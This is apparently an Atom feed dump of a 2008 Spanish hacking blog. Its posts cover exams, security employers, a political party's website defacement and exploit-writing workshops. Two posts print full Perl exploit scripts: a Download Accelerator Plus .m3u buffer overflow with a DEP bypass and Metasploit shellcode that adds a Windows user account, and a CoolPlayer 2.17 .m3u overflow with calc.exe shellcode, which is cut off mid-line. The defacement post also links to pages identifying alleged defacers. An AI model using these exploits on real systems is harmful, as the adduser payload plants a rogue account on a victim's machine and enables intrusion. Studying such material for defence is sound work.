rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=217955651319649317' title='4 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/217955651319649317'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/217955651319649317'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/05/viejo-artculo-sobre-cutre-ataques-en_01.html' title='Viejo artículo sobre cutre ataques en flash'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-717278949729219202</id><published>2008-04-29T19:43:00.004+02:00</published><updated>2008-04-29T19:48:25.352+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Menudo mes viene - Mayo</title><content type='html'>Últimamente tengo poco tiempo para postear por aquí, por P1MP4M.es, yashira.org  y en la lista tan buena de cracklatinos, y todo debido al instituto principalmente, aunque también a otros asuntos, así que durante el mes de Mayo, mes de exámenes, estaré desaparecido por estos lugares.&lt;br /&gt;&lt;br /&gt;A ver si para el 21 de Mayo me va todo bien, y me tomo las vacaciones más largas de la vida jeje, y a aprovechar a buscar vulnerabilidades pero sobretodo a aprender Ing Inversa, o quien sabe tal vez me ponga algo con las inyecciones que soy bastante paquete.&lt;br /&gt;&lt;br /&gt;Ale el que quiera algo que me diga por msn si me pilla o que me mande un mail, taluegooooo&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-717278949729219202?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/717278949729219202/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=717278949729219202' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/717278949729219202'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/717278949729219202'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/04/menudo-mes-viene-mayo.html' title='Menudo mes viene - Mayo'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-746056228864031945</id><published>2008-04-20T21:42:00.003+02:00</published><updated>2008-04-20T21:54:19.702+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><title type='text'>El final de hakin9 en español</title><content type='html'>Me acabo de acordar de una noticia la cual creo que no está en ningún sitio o al menos yo no lo vi y es que resulta que hakin9 en español desaparece después de años ofreciendo buena información tanto teórica como práctica. No se si la empresa se habrá pronunciado pero al tratar de hablar con ellos para ponerme a escribir un artículo, me contestaron y la contestación fue clara y precisa, la edición española de hakin9 ya no va a salir, así que toca recopilar todas las revistas hasta el momento.&lt;br /&gt;&lt;br /&gt;Por lo que una de las últimas entregas es la de Enero creo, del 2008, en la que el señor xD Chema habla de sql injection con consultas pesadas, y además tambien una recopilación de artículos para principantes.&lt;br /&gt;&lt;br /&gt;Primero desaparece HackXCrack y ahora Hakin9, con que revistas de hacking en español nos vamos a quedar?? :(&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-746056228864031945?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/746056228864031945/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=746056228864031945' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/746056228864031945'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/746056228864031945'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/04/el-final-de-hakin9-en-espaol.html' title='El final de hakin9 en español'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-1655017818502471281</id><published>2008-04-03T21:58:00.005+02:00</published><updated>2008-05-23T00:59:57.290+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Trabajo'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><title type='text'>Lugares donde trabajar</title><content type='html'>Después de estar participando en sitios haciendo retos, o intentándolos, moviéndome un poco en este mundillo he estado mirando varios sitios donde molaría trabajar. Como "ingeniero inverso" principalmente, auditorías, etc. Aunque en temas de vulnerabilidades está más centrado fuera de España, como Core, TippingPoint, etc, por aquí en algún trabajo creo que también hay, aunque ni idea porque nunca fui currante. A ver si alguno que sepa se pasa por aquí y me dice o me deja un comentario sobre el trabajo que tienen que hacer en distintos puestos :P.&lt;br /&gt;&lt;br /&gt;En Madrid hay un número de empresas que se dedican a ello, aunque fuera también(Que sepan que no es publicidad ya que no trabajé en ninguna pero por su gente me parece que tiene nivel o que está interesante).&lt;br /&gt;&lt;br /&gt;-&lt;a href="http://www.informatica64.com/"&gt;Informatica 64&lt;/a&gt; - Con su querido Chema Alonso y Microsoft xDD, Pedro Laguna...&lt;br /&gt;-&lt;a href="http://www.s21sec.com/"&gt;S21sec&lt;/a&gt; - Buena gente ha trabajado ahí, y actualmente mikel gastesi.&lt;br /&gt;-&lt;a href="http://www.sia.es/"&gt;SIA&lt;/a&gt; - Andrés Tarasco y Alejandro Ramos, etc.&lt;br /&gt;-&lt;a href="http://www.ecija.com/"&gt;Ecija&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Málaga:&lt;br /&gt;&lt;br /&gt;-&lt;a href="http://www.hispasec.com/"&gt;&lt;span class="a"&gt;HispaSec&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Barcelona:&lt;br /&gt;&lt;br /&gt;-&lt;a href="http://www.isecauditors.com/"&gt;ISecAuditors&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Otros:&lt;br /&gt;La gente de 48bits creo que trabaja de forma independiente pero se ve que son bastante buenos también.&lt;br /&gt;&lt;br /&gt;A ver si a partir de verano aprendo más de ingenieria inversa y consigo algo jeje, que va siendo hora y sino a seguir buscando vulns xD.&lt;br /&gt;&lt;br /&gt;Saludos a todos&lt;br /&gt;&lt;br /&gt;Editado.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-1655017818502471281?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/1655017818502471281/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=1655017818502471281' title='4 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/1655017818502471281'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/1655017818502471281'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/04/lugares-donde-trabajar.html' title='Lugares donde trabajar'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-4045407999422501473</id><published>2008-03-19T17:00:00.003+01:00</published><updated>2010-01-15T22:32:58.662+01:00</updated><title type='text'>Download Accelerator Plus(DAP), + DEP (Data Execution Prevention)</title><content type='html'>Ahi os dejo el exploit para que veais como poder desactivar esa proteccion tan maja que trae el windows xp sp2(activada por defecto para pocos procesos como explorer y desactivada para todo lo demas) y el windows 2003(activada para todo por defecto).&lt;br /&gt;&lt;br /&gt;Link de descarga del tutorial&lt;br /&gt;&lt;br /&gt;PD:Decir que funciona aunque DEP este desactivado tambien&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;################################################################################&lt;br /&gt;#####################################&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#Exploit por: Trancek&lt;br /&gt;#Email:trancek@yashira.org&lt;br /&gt;#&lt;br /&gt;################################################################################&lt;br /&gt;######################################&lt;br /&gt;use Cwd;&lt;br /&gt;&lt;br /&gt;print "Download Accelerator Plus (DAP) 0.86 .m3u Exploit\n\n";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$localhost = "http://localhost/";&lt;br /&gt;$junk = "\x90" x 14115; #Hasta el Ret&lt;br /&gt;$moval1 = "\x80\x20\x96\x7C"; #mov al,1 --&gt; ntdll.dll(xp sp2 spanish)&lt;br /&gt;$padding1 = "\x90" x 4; #NOP&lt;br /&gt;$especialret = "\x94\x11\x91\x7C"; #mov ebp,esp(+codigo hasta ret) --&gt; ntdll.dll(xp sp2 spanish)&lt;br /&gt;$padding2 = "\x90" x 8; #NOP&lt;br /&gt;$ret = "\xED\x1E\x95\x7C"; #jmp esp,win xp sp2(spanish)&lt;br /&gt;$cpmal1 = "\xF8\xD3\x92\x7C"; #cmp al,1 --&gt; ntdll.dll(xp sp2 spanish)&lt;br /&gt;$nopeando = "\x90" x 20; #NOP&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;# win32_adduser - PASS=test EXITFUNC=seh USER=test Size=489 Encoder=PexAlphaNum http://metasploit.com&lt;br /&gt;my $shellcode =&lt;br /&gt;"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".&lt;br /&gt;"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".&lt;br /&gt;"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".&lt;br /&gt;"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".&lt;br /&gt;"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".&lt;br /&gt;"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x33\x4b\x58\x4e\x57".&lt;br /&gt;"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x58".&lt;br /&gt;"\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48".&lt;br /&gt;"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".&lt;br /&gt;"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".&lt;br /&gt;"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48".&lt;br /&gt;"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x54".&lt;br /&gt;"\x4b\x58\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58".&lt;br /&gt;"\x41\x30\x4b\x4e\x49\x48\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43".&lt;br /&gt;"\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x43\x45\x38\x42\x4c\x4a\x47".&lt;br /&gt;"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".&lt;br /&gt;"\x4b\x48\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b".&lt;br /&gt;"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43".&lt;br /&gt;"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47".&lt;br /&gt;"\x42\x45\x4a\x36\x42\x4f\x4c\x58\x46\x30\x4f\x45\x4a\x36\x4a\x39".&lt;br /&gt;"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x4d\x46".&lt;br /&gt;"\x46\x46\x50\x42\x45\x56\x4a\x47\x45\x46\x42\x52\x4f\x52\x43\x36".&lt;br /&gt;"\x42\x32\x50\x46\x45\x46\x46\x57\x42\x52\x45\x47\x43\x37\x45\x36".&lt;br /&gt;"\x44\x37\x42\x32\x46\x37\x45\x36\x43\x47\x46\x37\x42\x42\x46\x37".&lt;br /&gt;"\x45\x36\x43\x37\x46\x37\x42\x52\x4f\x52\x41\x44\x46\x54\x46\x44".&lt;br /&gt;"\x42\x52\x48\x42\x48\x32\x42\x32\x50\x36\x45\x56\x46\x57\x42\x42".&lt;br /&gt;"\x4e\x36\x4f\x36\x43\x56\x41\x36\x4e\x56\x47\x46\x44\x37\x4f\x36".&lt;br /&gt;"\x45\x37\x42\x37\x42\x42\x41\x34\x46\x46\x4d\x56\x49\x56\x50\x46".&lt;br /&gt;"\x49\x56\x43\x57\x46\x37\x44\x37\x41\x56\x46\x47\x4f\x56\x44\x37".&lt;br /&gt;"\x43\x57\x42\x52\x46\x47\x45\x56\x43\x37\x46\x47\x42\x32\x4f\x52".&lt;br /&gt;"\x41\x34\x46\x34\x46\x34\x42\x30\x5a";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;open(m3u, "&gt;./vulnerable.m3u");&lt;br /&gt;print m3u "$localhost";&lt;br /&gt;print m3u "$junk";&lt;br /&gt;print m3u "$moval1";&lt;br /&gt;print m3u "$padding1";&lt;br /&gt;print m3u "$especialret";&lt;br /&gt;print m3u "$padding2";&lt;br /&gt;print m3u "$ret";&lt;br /&gt;print m3u "$cpmal1";&lt;br /&gt;print m3u "$nopeando";&lt;br /&gt;print m3u "$shellcode";&lt;br /&gt;&lt;br /&gt;print "Instrucciones: El usuario tiene que pulsar el boton verificar. \n";&lt;br /&gt;print "Con este exploit puede saltarse el DEP de Windows XP SP2\n\n";&lt;br /&gt;print "Archivo creado\n";&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-4045407999422501473?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/4045407999422501473/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=4045407999422501473' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/4045407999422501473'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/4045407999422501473'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/03/download-accelerator-plusdap-dep-data.html' title='Download Accelerator Plus(DAP), + DEP (Data Execution Prevention)'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-4873011540976746215</id><published>2008-03-02T22:23:00.003+01:00</published><updated>2008-03-02T22:54:01.454+01:00</updated><title type='text'>Deface a Izquierda Unida</title><content type='html'>Hoy al medio dia mientra veo Antena 3, hay una noticia que me llama la atención, izquierda unida ha sido "hackeada" por "hackers", definicion no bien dada ya que si no me confundo no superan seguramente los 20 años ni los conocimientos de los grandes, son más bien los defacers y que les ha pasado lo peor que les puede pasar, que se haga público y llamativa la noticia y por lo tanto, que tomen medidas en el asunto, como bien leo en elpais:&lt;br /&gt;--------------------------------------&lt;br /&gt;Según miembros del equipo técnico de IU, los 'hackers' han conseguido saltarse las medidas de seguridad y se han apoderado de la máquina que da alojamiento a la página, a la vez custodiada por una empresa puntera en Europa en suministrar servicios de Internet. "No son unos aficionados. &lt;span style="font-weight: bold;"&gt;Se han saltado todos nuestros filtros y controlan la máquina desde sus propios ordenadores&lt;/span&gt;. Nuestros técnicos están trabajando para solucionar el problema, pero es muy serio", dijo Francisco José Mendi.&lt;br /&gt;&lt;br /&gt;Izquierda Unida presentará una&lt;span style="font-weight: bold;"&gt; denuncia ante la Policía&lt;/span&gt; encargada de los 'cyberdelitos'. Para el responsable de comunicación de IU no hay ninguna duda de que se trata de "un ataque político", que podría ser obra de "algún grupo de ultraderecha camuflado de anarquistas".&lt;p&gt;&lt;/p&gt;--------------------------------------&lt;br /&gt;&lt;br /&gt;Al leer lo primero y conocer el antiguo grupo de DOM Team un poco pensé...son buenos pero tanto como para saltarse todos sus filtros?? Yo creo que habrá sido un poco de inyección SQL o vete tu a saber, algun password por defecto o cualquier otro bug a nivel web, pero muchos filtros no tendrían..pero bueno y lo 2º, es lo que viene a veces, esta vez creo que si le quieren pillar le pillan, porque hay alguno español me parece y además dejan sus datos a la vista de todos. Pero bueno deberian protegerse más y dejarse de gastar el dinero y tiempo en buscar a la gente que lo hace, que en protegerse para que no pase nada.&lt;br /&gt;&lt;br /&gt;Ahi dejo cosas para que vean lo facil que es ver algo por internet, y que si quieren no creo que tarden mucho ya que en algun lado de internet han dejado su ip verdadera o tal vez hasta nombre real. Solo es cuestion de tiempo y dinero.&lt;br /&gt;&lt;br /&gt;Datos:&lt;br /&gt;http://whois.domaintools.com/domlabs.org&lt;br /&gt;http://www.spanish-hackers.com/users/ka0x.txt&lt;br /&gt;&lt;br /&gt;Blog:&lt;br /&gt;http://buclenoapto.wordpress.com/&lt;br /&gt;http://xarnuz.wordpress.com/&lt;br /&gt;&lt;br /&gt;Sobre DOM Team:&lt;br /&gt;http://www.zone-h.org/component/option,com_attacks/Itemid,43/filter_defacer,D.O.M/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PD: Respecto a este comentario:&lt;br /&gt;-----&lt;br /&gt;Para el responsable de comunicación de IU no hay ninguna duda de que se trata de "un ataque político", que podría ser obra de "algún grupo de ultraderecha camuflado de anarquistas".&lt;br /&gt;-----&lt;br /&gt;&lt;br /&gt;Yo creo que lo dice para que se haga notar IU nada más, lo hacen con cualquier partido y cualquier página, no creo que hayan elegido IU por ser IU, cuanta consipiracion...un grupo de ultraderechas camuflado de anarquistas...revisen los ataques diarios y veran como eso no importa xDD.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Noticia:&lt;br /&gt;http://www.elmundo.es/elmundo/2008/03/02/eleccionesgenerales/1204457114.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-4873011540976746215?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/4873011540976746215/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=4873011540976746215' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/4873011540976746215'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/4873011540976746215'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/03/deface-izquierda-unida.html' title='Deface a Izquierda Unida'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-5244241848690585495</id><published>2008-02-12T22:46:00.000+01:00</published><updated>2008-02-12T22:54:15.472+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ingenieria Inversa'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>A la carga con los exploits</title><content type='html'>El taller ya lo abrí para irse iniciando, decir que aunque está un poco chapuza, espero que no tengan problemas y aprendan mucho, todos los post del foro se irán actualizando a medida que haya más información, corrección de fallos, links que falta poner, software que analizar, etc.&lt;br /&gt;&lt;br /&gt;Así que espero que se animen y aprendan que es un tema bastante bonito jejej&lt;br /&gt;&lt;br /&gt;Os espero a todos los que se animen y quieran compartir y aprender&lt;br /&gt;&lt;br /&gt; Saludos y suerte&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Link:&lt;a href="http://www.p1mp4m.es/index.php?showforum=28"&gt;http://www.p1mp4m.es/index.php?showforum=28&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-5244241848690585495?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/5244241848690585495/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=5244241848690585495' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5244241848690585495'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/5244241848690585495'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/02/la-carga-con-los-exploits.html' title='A la carga con los exploits'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-3032491065104345139</id><published>2008-01-23T23:48:00.000+01:00</published><updated>2008-01-23T23:58:27.122+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ingenieria Inversa'/><category scheme='http://www.blogger.com/atom/ns#' term='P1mp4m'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Taller de Buffer Overflow</title><content type='html'>Una idea que tenía hace tiempo y que me precipité al intentar hacerlo sin mucha experiencia, y ahora aunque no domino el tema, me gustaría empezar a enseñar para seguir los pasos de quienes nos enseñan en este mundillo, para ello se empezará desde lo más bajo y se irá subiendo el nivel. Espero que esto coja fuerza y sean unos cuantos los que se apunten y se interesen, además con un poco de suerte, quien sabe, tal vez terminemos todos dominando el tema antes de lo que pensabamos, pero claro para ello hay que saber bastantes cosas y lleva tiempo. Así que nada, quien quiera apuntarse, que se diriga a http://www.p1mp4m.es/index.php?showtopic=65 y se apunte u opine cualquier cosilla.&lt;br /&gt;&lt;br /&gt;Espero que os guste el tema y cuando comience aprendais tanto como yo estoy aprendiendo y mas!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-3032491065104345139?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/3032491065104345139/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=3032491065104345139' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/3032491065104345139'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/3032491065104345139'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2008/01/taller-de-buffer-overflow.html' title='Taller de Buffer Overflow'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-6519865457833850012</id><published>2007-12-30T17:33:00.000+01:00</published><updated>2007-12-30T17:35:46.505+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Exploit para CoolPlayer 2.17, .m3u</title><content type='html'>Despues de pasar por algun problemilla...se pudo solucionar y terminar el exploit listo y funcional:&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;################################################################################&lt;br /&gt;#####################################&lt;br /&gt;#&lt;br /&gt;#CoolPlayer, Latest Build: 217&lt;br /&gt;#Web:: &lt;a href="http://coolplayer.sourceforge.net/" target="_blank"&gt;http://coolplayer.sourceforge.net/&lt;/a&gt;&lt;br /&gt;#Playlist(.m3u) File Local Buffer Overflow Exploit&lt;br /&gt;#&lt;br /&gt;#Vuln:http://www.securityfocus.com/bid/21396&lt;br /&gt;#&lt;br /&gt;#Instrucciones:coolplayerm3u.pl debe de estar en el mismo directorio que el perl.exe&lt;br /&gt;#&lt;br /&gt;#Agradecimientos a: Luigi Auriemma que ha descubierto una nueva vulnerabilidad en este software junto&lt;br /&gt;#                   a esta vuln que era antigua y que ha sido redescubierta en un software con adware por mi jeje&lt;br /&gt;#      TotalPlayer 3.0(fake de Coolplayer), thanks luigi xDD&lt;br /&gt;#                   Además del equipo de www.p1mp4m.es --&gt;musashi,patoruzu,elvispresley,pepepistola,skyline2412&lt;br /&gt;#&lt;br /&gt;#      Y en especial a este ultimo:skyline2412(puso parte del codigo y me ayudo bastante con la tarea) y&lt;br /&gt;#                   el_manguan que estuvo ayudando tambien y probando.&lt;br /&gt;#&lt;br /&gt;#Exploit por: Trancek&lt;br /&gt;#Email:trancek@yashira.org&lt;br /&gt;#&lt;br /&gt;################################################################################&lt;br /&gt;######################################&lt;br /&gt;use Cwd;&lt;br /&gt;&lt;br /&gt;print "CoolPlayer 2.17 .m3u Exploit\n\n";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$dir = getcwd()."/";&lt;br /&gt;$lon = length($dir);&lt;br /&gt;$nanai = 260 - $lon;&lt;br /&gt;$junk = 'A' x $nanai;&lt;br /&gt;$ret = "\xED\x1E\x95\x7C"; #jmp esp,win xp sp2(spanish)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;# win32_exec -  EXITFUNC=thread CMD=calc.exe Size=164 Encoder=PexFnstenvSub &lt;a href="http://metasploit.com/" target="_blank"&gt;http://metasploit.com&lt;/a&gt;&lt;br /&gt;my $shellcode =&lt;br /&gt;"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x66".&lt;br /&gt;"\x3f\x59\x90\x83\xeb\xfc\xe2\xf4\x9a\xd7\x1d\x90\x66\x3f\xd2\xd5".&lt;br /&gt;"\x5a\xb4\x25\x95\x1e\x3e\xb6\x1b\x29\x27\xd2\xcf\x46\x3e\xb2\xd9".&lt;br /&gt;"\xed\x0b\xd2\x91\x88\x0e\x99\x09\xca\xbb\x99\xe4\x61\xfe\x93\x9d".&lt;br /&gt;"\x67\xfd\xb2\x64\x5d\x6b\x7d\x94\x13\xda\xd2\xcf\x42\x3e\xb2\xf6".&lt;br /&gt;"\xed\x33\x12\x1b\x39\x23\x58\x7b\xed\x23\xd2\x91\x8d\xb6\x05\xb4".&lt;br /&gt;"\x62\xfc\x68\x50\x02\xb4\x19\xa0\xe3\xff\x21\x9c\xed\x7f\x55\x1b".&lt;br /&gt;"\x16\x23\xf4\x1b\x0e\x37\xb2\x99\xed\xbf\xe9\x90\x66\x3f\xd2\xf8".&lt;br /&gt;"\x5a\x60\x68\x66\x06\x69\xd0\x68\xe5\xff\x22\xc0\x0e\xd0\x97\x70".&lt;br /&gt;"\x06\x57\xc1\x6e\xec\x31\x0e\x6f\x81\x5c\x38\xfc\x05\x11\x3c\xe8".&lt;br /&gt;"\x03\x3f\x59\x90";&lt;br /&gt;&lt;br /&gt;$nopeando = "\x90" x 20;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;open(m3u, "&gt;./vuln.m3u");&lt;br /&gt;print m3u "$junk";&lt;br /&gt;print m3u "$ret";&lt;br /&gt;print m3u "$nopeando";&lt;br /&gt;print m3u "$shellcode";&lt;br /&gt;&lt;br /&gt;print "Instrucciones: coolplayerm3u.pl debe de estar en el mismo directorio que el \n";&lt;br /&gt;print "perl.exe o al llamarlo debes de tener el directorio de perl en las variables de entorno \n\n";&lt;br /&gt;&lt;br /&gt;print "Directorio: ",$dir,"\n";&lt;br /&gt;print "Longitud del directorio: ",$lon,"\n";&lt;br /&gt;print "Numero de Junk(A) Total: ",$nanai,"\n\n";&lt;br /&gt;&lt;br /&gt;print "Cuidado: Cambiar el archivo de directorio, provoca que no funcione el 